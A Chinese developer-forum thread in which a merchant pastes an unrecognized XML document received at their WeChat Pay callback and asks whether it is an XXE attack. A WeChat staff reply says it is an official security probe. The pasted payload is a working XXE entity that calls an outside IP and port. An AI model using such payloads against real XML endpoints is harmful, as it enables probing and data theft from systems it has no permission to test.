收藏
回答

微信支付回调接口 收到了不识别的XML文件

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE root [<!ENTITY xxe SYSTEM 

"http://101.91.62.170:4837/wx_xxe_dbc_os_2018092803_79?aHR0cHM6Ly93d3cuamlhbmd4aW5nODg4LmNvbS9odWlTaGVuZ0h1by9hY3Rpb24vV2VpeGluUGF5Q2FsbGJhY2tBY3Rpb24vY2FsbGJhY2s=">]>

<foo>

<value>&xxe;</value>

</foo>

收到的XML 内容是这样的  自己查了查 好像是  XXE漏洞攻击。。我也不能确认 访问这个地址 也是 404 看看是不是官方给了什么东西我们漏掉了

最后一次编辑于  2018-09-28  (未经腾讯允许,不得转载)
邀请回答
复制链接收藏投诉关注问题回答

1 个回答

  • wechat-晓伟
    wechat-晓伟
    2018-09-29

    你好,这个是微信官方检测商户是否存在安全问题的回调,详细可以查看https://pay.weixin.qq.com/wiki/doc/api/jsapi.php?chapter=23_5,如果没有问题,可以忽略此回调。

    2018-09-29
    赞同
    回复 2
    • (⊙o⊙)
      (⊙o⊙)
      2018-10-09

      借贴,我们这边收到了警报,请问修复后如何主动检测?试过【安全医生】,但是域名验证过不了,浏览器都可以访问到验证文件,但是就是验证不了域名。

      2018-10-09
      回复
    • 梧高
      梧高
      07-26
      我也域名验证不过
      07-26
      回复